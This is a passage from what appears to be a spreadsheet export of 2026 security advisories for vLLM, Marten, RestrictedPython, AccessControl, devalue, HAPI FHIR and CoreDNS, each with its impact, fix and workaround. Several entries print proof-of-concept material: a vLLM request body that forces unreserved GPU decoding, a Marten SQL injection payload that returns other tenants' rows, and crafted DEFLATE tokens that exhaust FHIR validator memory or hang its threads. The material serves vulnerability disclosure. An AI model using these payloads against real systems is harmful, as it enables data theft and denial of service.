video_io_kwargs = dict(self.media_io_kwargs.get("video", {}))
if "video_backend" not in video_io_kwargs and (
    video_backend := get_video_loader_backend_for_processor(video_processor)
):
    video_io_kwargs["video_backend"] = video_backend
video_io = VideoMediaIO(image_io, **video_io_kwargs)
```
```python
video_loader_backend = (
    kwargs.pop("video_backend", None) or envs.VLLM_VIDEO_LOADER_BACKEND
)
self.video_loader = VIDEO_LOADER_REGISTRY.load(video_loader_backend)
```
`VideoBackend.load_bytes()` then dispatches `backend == "pynvvideocodec"` into `decode_frames_pynvvideocodec()`, which constructs a PyNvVideoCodec decoder, creates or uses a CUDA stream, reads stream metadata, decodes selected frames on the GPU, and copies those frames into pinned host memory. The new frontend GPU memory pool accounts only for raw decoded frame bytes when a pool exists; it does not make request-time backend selection safe when no startup reservation was made.
The engine-side reservation code makes its decision from static model config and environment only:
```python
def _uses_pynvvideocodec_video_backend(mm_config) -&gt; bool:
    video_kwargs = mm_config.media_io_kwargs.get("video", {})
    video_loader_backend = (
        video_kwargs.get("video_backend") or envs.VLLM_VIDEO_LOADER_BACKEND
    )
    codec_backend = video_kwargs.get("backend")
    return (
        video_loader_backend == PYNVVIDEOCODEC_VIDEO_BACKEND
        or codec_backend == PYNVVIDEOCODEC_VIDEO_BACKEND
    )
```
```python
decoder_reserved_bytes = (
    num_api_servers * per_server_decoder_bytes
    if self._uses_pynvvideocodec_video_backend(mm_config)
    else 0
)
reserved_bytes = raw_frame_reserved_bytes + decoder_reserved_bytes
if reserved_bytes &lt;= 0:
    return available_kv_cache_memory_bytes
```
With default static video configuration, `mm_config.media_io_kwargs["video"]` does not name PyNvVideoCodec and `VLLM_VIDEO_LOADER_BACKEND` defaults to OpenCV/software decoding. The worker therefore reserves no PyNv decoder/CUDA-context bytes. A later request can still set `media_io_kwargs.video.video_backend="pynvvideocodec"` and reach the GPU decoder path because that runtime field is intentionally honored by `VideoMediaIO`.
## PoV
An ordinary multimodal inference request can carry the backend override in the request body:
```json
{
  "model": "served-vlm",
  "messages": [
    {
      "role": "user",
      "content": [
        {"type": "text", "text": "summarize this clip"},
        {"type": "video_url", "video_url": {"url": "data:video/mp4;base64,&lt;small-mp4&gt;"}}
      ]
    }
  ],
  "media_io_kwargs": {
    "video": {
      "video_backend": "pynvvideocodec"
    }
  }
}
```
The following bounded source-level check confirms the code path without allocating GPU memory:
```bash
git clone --filter=blob:none https://github.com/vllm-project/vllm.git
cd vllm
git checkout ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a
python3 check_pynv_backend_reservation.py --repo .
```
## PoC
The bounded check validates current source markers, simulates the exact static reservation predicate, and compares vulnerable and negative-control configurations. Key output:
```json
{
  "vulnerable": true,
  "head": "ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a",
  "reservation_simulation": {
    "env_video_loader_backend": "opencv",
    "request_selects_pynv_after_startup": true,
    "vulnerable_static_reserved_bytes": 0,
    "negative_control_static_pynv_reserved_bytes": 2066953011,
    "raw_frame_only_control_reserved_bytes": 268435456,
    "unreserved_decoder_bytes_when_only_request_selects_pynv": 2066953011
  }
}
```
The negative control is important: when PyNvVideoCodec is selected statically, the worker reserves `2066953011` bytes per API process for decoder surfaces plus CUDA context. The vulnerable case reserves `0` bytes for the same decoder overhead because PyNvVideoCodec is selected only by the later request. A second control with static OpenCV plus `mm_ipc_gpu_memory_gb=0.25` reserves only the raw-frame semaphore budget and still does not reserve PyNv decoder/CUDA-context bytes.
## Impact
An attacker who can submit video requests to a vLLM deployment with PyNvVideoCodec available can force frontend GPU decoding even when the engine did not reserve memory for that decoder during startup. On high-utilization serving deployments, the unreserved CUDA context, retained decoder surfaces, and decoded-frame allocations can reduce or exhaust GPU memory that the engine assumed was available for weights, activations, or KV cache, causing request failures, worker crashes, or service-level denial of service.
Suggested severity is Medium with conservative CVSS v3.1 `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` (6.5). If a deployment exposes the affected API without authentication, `PR:N` would raise the deployment-specific score. Suggested weaknesses are `CWE-770` (Allocation of Resources Without Limits or Throttling) and `CWE-400` (Uncontrolled Resource Consumption). This should not be rated Low because the affected resource is shared GPU memory in the serving path and the code already treats the PyNv decoder/CUDA-context footprint as large enough to reserve at startup when statically configured.
Limitations: exploitation requires a GPU deployment where PyNvVideoCodec is installed and usable, and the request must reach a video-capable model/path. The issue does not claim code execution, data disclosure, or SSRF.
## Suggested Fix
Do not allow untrusted request fields to select a GPU decoder that was not included in startup memory reservation. The simplest fix is to reject request-level `media_io_kwargs.video.video_backend="pynvvideocodec"` unless the static server configuration already selected PyNvVideoCodec and reserved its decoder/CUDA-context budget.
If dynamic backend selection remains supported, split software and GPU decoder policies: allow request selection among CPU/software decoders only, require an explicit operator allowlist for GPU decoders, and include every request-selectable GPU decoder in the startup reservation predicate. Add regression coverage for static OpenCV startup config plus request-level PyNvVideoCodec override, and preserve the negative control where static PyNvVideoCodec configuration reserves decoder/CUDA-context bytes.
## Affected Package/Versions
Package: `vllm` from `vllm-project/vllm`.
Confirmed affected: current `main` at `ddd3855a28a561a5bb54d380c6e6b8b1e883cc4a`.
Introduced by: `af16446bf39de047ab57649c933063cf1cbf1e50`, `Vram semaphore infra (#44465)`, committed 2026-06-26T17:32:51-07:00.
Release status checked: `git tag --contains af16446bf` returned no release tags in the fresh checkout. GitHub repository metadata reported latest published release `v0.23.0` published 2026-06-15T05:27:20Z; the local `v0.24.0` tag also does not contain the introducing commit. The affected range should therefore be current `main` builds containing `af16446bf` until fixed, rather than a confirmed released-version range.
## Advisory History
Public vLLM advisories checked included audio decompression-bomb DoS, unbounded `video/jpeg` frame-count DoS, MediaConnector SSRF, video processing RCE, multimodal embedding DoS/RCE, GGUF GPU memory exposure, multimodal hashing, and other request-parameter DoS classes. None matched request-selected PyNvVideoCodec or the static VRAM reservation mismatch.
Prior local/private vLLM report families checked included request-level `media_io_kwargs` reopening `video/jpeg` frame fanout, GLM video metadata amplification, and audio media decode duration-limit bypass. Those reports share the request-level media kwargs boundary, but they target CPU/media decode limits or model metadata amplification. This report targets a different privileged asset and fix surface: GPU decoder selection after engine startup memory reservation.
Focused GitHub issue/PR searches for `pynvvideocodec`, `mm_ipc_gpu_memory`, `video_backend media_io_kwargs`, `Vram semaphore infra`, and `frontend multimodal GPU decoding` found the PyNvVideoCodec zero-copy RFC, an old do-not-review prototype, merged PR `#44465`, and an unrelated TorchCodec backend PR. No public issue or PR described this security boundary.
## Appendix: Bounded Source-Level Check
```python
#!/usr/bin/env python3
from __future__ import annotations
import argparse
import json
import re
import subprocess
from pathlib import Path
MIB = 1024 * 1024
GIB = 1024 * MIB
def read(repo: Path, rel: str) -&gt; str:
    return (repo / rel).read_text(encoding="utf-8")
def const_int(source: str, name: str) -&gt; int:
    expr = re.search(rf"^{name}\s*=\s*(.+)$", source, flags=re.MULTILINE).group(1).strip()
    if expr == "128 * MiB_bytes":
        return 128 * MIB
    if expr == "int(1.8 * 1024 * MiB_bytes)":
        return int(1.8 * 1024 * MIB)
    if expr == "1":
        return 1
    raise AssertionError(expr)
def uses_pynv_static(static_media_io_kwargs: dict[str, dict[str, str]], env_backend: str) -&gt; bool:
    video_kwargs = static_media_io_kwargs.get("video", {})
    video_loader_backend = video_kwargs.get("video_backend") or env_backend
    codec_backend = video_kwargs.get("backend")
    return video_loader_backend == "pynvvideocodec" or codec_backend == "pynvvideocodec"
def reserve_bytes(static_media_io_kwargs, env_backend, mm_ipc_gpu_memory_gb, decoder_bytes, cuda_context_bytes, retained_decoders):
    raw_frame_reserved_bytes = int(mm_ipc_gpu_memory_gb * GIB)
    per_server_decoder_bytes = decoder_bytes * retained_decoders + cuda_context_bytes
    decoder_reserved_bytes = per_server_decoder_bytes if uses_pynv_static(static_media_io_kwargs, env_backend) else 0
    return raw_frame_reserved_bytes + decoder_reserved_bytes
parser = argparse.ArgumentParser()
parser.add_argument("--repo", required=True, type=Path)
repo = parser.parse_args().repo.resolve()
media_video = read(repo, "vllm/multimodal/media/video.py")
connector = read(repo, "vllm/multimodal/media/connector.py")
chat_protocol = read(repo, "vllm/entrypoints/openai/chat_completion/protocol.py")
responses_protocol = read(repo, "vllm/entrypoints/openai/responses/protocol.py")
gpu_worker = read(repo, "vllm/v1/worker/gpu_worker.py")
video_core = read(repo, "vllm/multimodal/video.py")
assert "media_io_kwargs: dict[str, dict[str, Any]] | None = Field(" in chat_protocol
assert "media_io_kwargs: dict[str, dict[str, Any]] | None = Field(" in responses_protocol
assert 'video_io_kwargs = dict(self.media_io_kwargs.get("video", {}))' in connector
assert 'if "video_backend" not in video_io_kwargs and (' in connector
assert 'kwargs.pop("video_backend", None) or envs.VLLM_VIDEO_LOADER_BACKEND' in media_video
assert "elif backend == PYNVVIDEOCODEC_VIDEO_BACKEND:" in video_core
assert 'video_kwargs = mm_config.media_io_kwargs.get("video", {})' in gpu_worker
decoder_bytes = const_int(video_core, "PYNVVIDEOCODEC_DECODER_GPU_MEMORY_BYTES")
retained_decoders = const_int(video_core, "PYNVVIDEOCODEC_MAX_RETAINED_DECODERS")
cuda_context_bytes = const_int(video_core, "PYNVVIDEOCODEC_CUDA_CONTEXT_BYTES")
per_server_decoder_bytes = decoder_bytes * retained_decoders + cuda_context_bytes
vulnerable_static_reserved = reserve_bytes({}, "opencv", 0.0, decoder_bytes, cuda_context_bytes, retained_decoders)
negative_control_reserved = reserve_bytes({"video": {"video_backend": "pynvvideocodec"}}, "opencv", 0.0, decoder_bytes, cuda_context_bytes, retained_decoders)
raw_frame_only_control = reserve_bytes({}, "opencv", 0.25, decoder_bytes, cuda_context_bytes, retained_decoders)
head = subprocess.check_output(["git", "-C", str(repo), "rev-parse", "HEAD"], text=True).strip()
print(json.dumps({
    "head": head,
    "vulnerable": vulnerable_static_reserved == 0 and negative_control_reserved == per_server_decoder_bytes,
    "reservation_simulation": {
        "env_video_loader_backend": "opencv",
        "request_selects_pynv_after_startup": True,
        "vulnerable_static_reserved_bytes": vulnerable_static_reserved,
        "negative_control_static_pynv_reserved_bytes": negative_control_reserved,
        "raw_frame_only_control_reserved_bytes": raw_frame_only_control,
        "unreserved_decoder_bytes_when_only_request_selects_pynv": per_server_decoder_bytes,
    },
}, indent=2, sort_keys=True))
```</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69147</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75513</t>
        </is>
      </c>
      <c r="D24" s="5" t="inlineStr"/>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr">
        <is>
          <t>nuget:Marten</t>
        </is>
      </c>
      <c r="M24" s="5" t="inlineStr">
        <is>
          <t>9.13.0</t>
        </is>
      </c>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr"/>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>Several code paths in Marten's LINQ provider and tenant-management internals interpolated a runtime, potentially attacker-influenced value into generated SQL as a single-quoted string literal without escaping or parameterization. A value containing a single quote (`'`) could break out of the literal and inject arbitrary SQL.
The primary vector is a `Dictionary&lt;,&gt;` indexer **key** used in a `Where` filter — `Where(x =&gt; x.Attributes[key] == v)` — a common "filter by attribute name" / EAV pattern. It is confirmed with an executed proof-of-concept and yields filter / multi-tenant authorization bypass (returning other tenants' rows) and blind data exfiltration. Where the application permits `;`-batched statements (Npgsql default), data modification is also possible.
## Affected sinks
- `Linq/Members/Dictionaries/DictionaryItemMember.cs` — dictionary indexer key (primary, confirmed PoC)
- `Linq/Members/Dictionaries/DictionaryContainsKeyFilter.cs` — `Dictionary.ContainsKey(key)` (Newtonsoft serializer only; System.Text.Json escapes the quote)
- `Linq/Parsing/SelectParser.cs` — a constant string projected through `Select(x =&gt; new { L = runtimeString })`
- `Internal/Operations/DeleteAllForTenant.cs` — tenant id reaching per-tenant projection teardown via `IEventStore.DeleteProjectionProgressAsync` (an in-code comment wrongly claimed the value was validated)
- `Schema/DatabaseScopedTenantPartitions.cs` — tenant id inlined into `FOR VALUES IN ('...')` partition DDL
- `Events/Daemon/Internals/EventLoader.cs` (defense-in-depth) — per-tenant partition-pruning literal
## Proof of concept (primary vector)
Benign: `x.Attributes["nonexistent-key"] == "v"` returns 0 rows. Attack: `x.Attributes["nonexistent' = '' or 1=1 --"] == "v"` returns all rows. Generated SQL:
```
select d.data from public.mt_doc_doc as d where d.data -&gt; 'Attributes' -&gt;&gt; 'x' or 1=1 --' = :p0;
```
## Fix
Each sink now escapes embedded single quotes (`.Replace("'", "''")`, mirroring the existing `Ordering.BuildNgramRankExpression`) or binds the value as a parameter (`DeleteAllForTenant`). Where a literal is retained for partition pruning, escaping preserves plan-time pruning while closing the injection. Regression tests lock down each vector.
## Workarounds
Until upgrading: do not pass untrusted input as a dictionary indexer key / `ContainsKey` argument / `Select` constant, nor as a tenant id into projection teardown or provisioning; and disable multi-statement command batching to limit blast radius.
## Credit
Reported privately and responsibly by an external security researcher with an executed PoC. Additional sinks found during the follow-up LINQ-wide audit.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75513</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76825</t>
        </is>
      </c>
      <c r="D25" s="5" t="inlineStr"/>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr">
        <is>
          <t>pip:RestrictedPython</t>
        </is>
      </c>
      <c r="M25" s="5" t="inlineStr">
        <is>
          <t>8.4</t>
        </is>
      </c>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr"/>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-470, CWE-680, CWE-693</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>### Impact
RestrictedPython could allow a sandbox escape when a policy exposes the standard library `string` module, or otherwise exposes `string.Formatter`, to restricted code.
`string.Formatter` field resolution methods such as `get_field` can perform attribute and item traversal internally and return live object references. This can bypass RestrictedPython's normal attribute guards and may allow access to sensitive objects such as function globals, builtins, file access, or code execution primitives.
Users are impacted if they run untrusted code with RestrictedPython and expose `string.Formatter`, directly or indirectly, for example through a custom import policy or globals.
### Patches
The problem has been patched by blocking access to `string.Formatter` and unsafe `string.Formatter` traversal methods in `safer_getattr`.
Users should upgrade to the patched release once available. Affected and patched version numbers should be filled in when the release is published.
### Workarounds
Do not expose the standard library `string` module or `string.Formatter` to restricted code.
If a custom import hook is used, deny imports of `string` or provide only a restricted wrapper that does not expose `Formatter`. If custom globals are supplied, ensure neither `string.Formatter` nor `Formatter` instances are available to restricted code.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76825</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77401</t>
        </is>
      </c>
      <c r="D26" s="5" t="inlineStr"/>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>pip:AccessControl</t>
        </is>
      </c>
      <c r="M26" s="5" t="inlineStr">
        <is>
          <t>7.4</t>
        </is>
      </c>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr"/>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>### Impact
Python's string `format` functionality allows someone controlling the format string to "read" objects accessible (recursively) via attribute access and subscription from accessible objects. Those attribute accesses and subscriptions use Python's full blown `getattr` and `getitem`, not the policy restricted `AccessControl` variants `_getattr_` and `_getitem_`. This can lead to critical information disclosure.
The `AccessControl` package already guards against direct access to the formatting functions on string instances, but these mitigations did not cover subclasses of `str`.
Affected are all users who allow untrusted users to create AccessControl controlled Python code and execute it.
### Patches
A fix was published with version 7.4.
### Workarounds
There is no workaround.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77401</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81176</t>
        </is>
      </c>
      <c r="D27" s="5" t="inlineStr"/>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>npm:devalue</t>
        </is>
      </c>
      <c r="M27" s="5" t="inlineStr">
        <is>
          <t>5.9.2</t>
        </is>
      </c>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr"/>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>### Impact
`devalue.parse` prior to version 5.9.2 fails to reject out-of-bounds indices. Specially-crafted payloads can exploit this to cause devalue to alternate between different array representations, resulting in work that is quadratic with payload size.
Applications are potentially affected if they call `devalue.parse` with untrusted data.
### Patches
The bug is fixed in `devalue@5.9.2`.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81176</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81875</t>
        </is>
      </c>
      <c r="D28" s="5" t="inlineStr"/>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>maven:ca.uhn.hapi.fhir:org.hl7.fhir.r5, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation.cli</t>
        </is>
      </c>
      <c r="M28" s="5" t="inlineStr">
        <is>
          <t>6.9.12</t>
        </is>
      </c>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr"/>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-409</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>### Summary
`SHCParser` inflates compressed Smart Health Card JWT payloads into memory without a decompressed-size limit. An attacker who can submit SHC content for validation can craft a small compressed JWT payload that expands to a very large byte array, causing memory exhaustion or severe garbage collection pressure.
### Details
The vulnerable code is in `org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java`.
`decodeJWT()` checks `MAX_ALLOWED_SHC_LENGTH`, but this only logs an error and parsing continues:
```java
// SHCParser.java:282-284
if (jwt.length() &gt; MAX_ALLOWED_SHC_LENGTH) {
  logError(...);
}
```
If the header contains `"zip":"DEF"`, the payload is inflated before JSON parsing:
```java
// SHCParser.java:300-304
if ("DEF".equals(res.header.asString("zip"))) {
  payloadJson = inflate(payloadJson);
}
res.payload = JsonParser.parseObject(FileUtilities.bytesToString(payloadJson), true);
```
`inflate()` accumulates all decompressed output in a `ByteArrayOutputStream` and has no maximum output size:
```java
// SHCParser.java:455-468
while (!inflater.finished()) {
  final int count = inflater.inflate(buffer);
  outputStream.write(buffer, 0, count);
}
return outputStream.toByteArray();
```
The same unbounded decompression pattern exists in `decompress()` at `SHCParser.java:410-423`.
### PoC
Create a highly compressible SHC-shaped JSON payload, compress it with raw DEFLATE (`new Deflater(9, true)`), Base64URL-encode it as the JWT payload, and set the JWT header to `{"zip":"DEF"}`.
Local verification measured the following expansion through `SHCParser.inflate()`:
```text
plain=1000066 compressed=1052 inflated=1000066 ratio=950
plain=16000066 compressed=15626 inflated=16000066 ratio=1023
```
A small compressed payload can therefore allocate many megabytes of heap. Larger payloads can trigger `OutOfMemoryError` or process instability.
### Impact
This is a denial-of-service vulnerability. Any validator service or application that accepts attacker-supplied SHC content can be forced to allocate excessive heap memory. Impact ranges from request failure and severe GC pressure to process termination.
### Credits
- Thai Son Dinh from VinSOC Labs (R&amp;D)</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81875</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81876</t>
        </is>
      </c>
      <c r="D29" s="5" t="inlineStr"/>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>maven:ca.uhn.hapi.fhir:org.hl7.fhir.r5, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation.cli</t>
        </is>
      </c>
      <c r="M29" s="5" t="inlineStr">
        <is>
          <t>6.9.12</t>
        </is>
      </c>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr"/>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>### Summary
A malformed Smart Health Card (SHC) JWT with `zip: "DEF"` and an empty or truncated DEFLATE payload causes `SHCParser.inflate()` to loop forever. This allows an attacker who can submit SHC content for validation to pin a JVM worker thread indefinitely, causing denial of service.
### Details
The vulnerable code is in `org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java`.
`decodeJWT()` inflates the JWT payload when the header contains `"zip":"DEF"`:
```java
// SHCParser.java:300-302
if ("DEF".equals(res.header.asString("zip"))) {
  payloadJson = inflate(payloadJson);
}
```
`inflate()` loops only on `!inflater.finished()` and does not check `inflater.needsInput()`, `inflater.needsDictionary()`, or zero-progress output:
```java
// SHCParser.java:455-468
while (!inflater.finished()) {
  final int count = inflater.inflate(buffer);
  outputStream.write(buffer, 0, count);
}
```
For empty or truncated raw DEFLATE input, `Inflater.inflate()` returns `0`, `finished()` remains `false`, and `needsInput()` becomes `true`, producing an infinite tight loop. The same unsafe loop pattern also exists in `decompress()` at `SHCParser.java:410-423`.
The validator reaches this path during SHC validation and during file-format detection for SHC-looking input (`ResourceChecker.java:115-118`).
### PoC
Compile the project, then run a minimal local harness that calls:
```java
SHCParser.inflate(new byte[0]);
```
This never returns. Local verification:
```bash
timeout 3s java -cp ... VerifyDoSFindings shcHang
echo $?
# 124 = timeout killed the hung process
```
A JWT PoC uses:
- header: Base64URL(`{"zip":"DEF"}`)
- payload: empty or truncated raw DEFLATE bytes
- signature: arbitrary
Submit the resulting token as SHC content, for example via a `.shc` file or content beginning with `shc:/` that reaches the validator's SHC detection path.
### Impact
This is a denial-of-service vulnerability. A single malformed SHC validation request can consume a worker thread indefinitely. In services that validate uploaded SHC content, a small number of concurrent malformed requests can exhaust all validation workers.
### Credits
- Thai Son Dinh from VinSOC Labs (R&amp;D)</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81876</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82399</t>
        </is>
      </c>
      <c r="D30" s="5" t="inlineStr"/>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M30" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr"/>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>### Summary
CoreDNS parses attacker-controlled DNS section counts before validating them on DNS-over-HTTPS (DoH and DoH3), DNS-over-QUIC (DoQ), and DNS-over-gRPC listeners. An unauthenticated client can use DNS name compression to make one
65,533-byte request allocate more than 10 MiB while it is unpacked. Concurrent requests can exhaust memory and terminate CoreDNS.
### Details
The affected request paths call `dns.Msg.Unpack` directly:
- [DoH POST and GET decoding](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/doh/doh.go#L134-L155). DoH3 uses the same decoder.
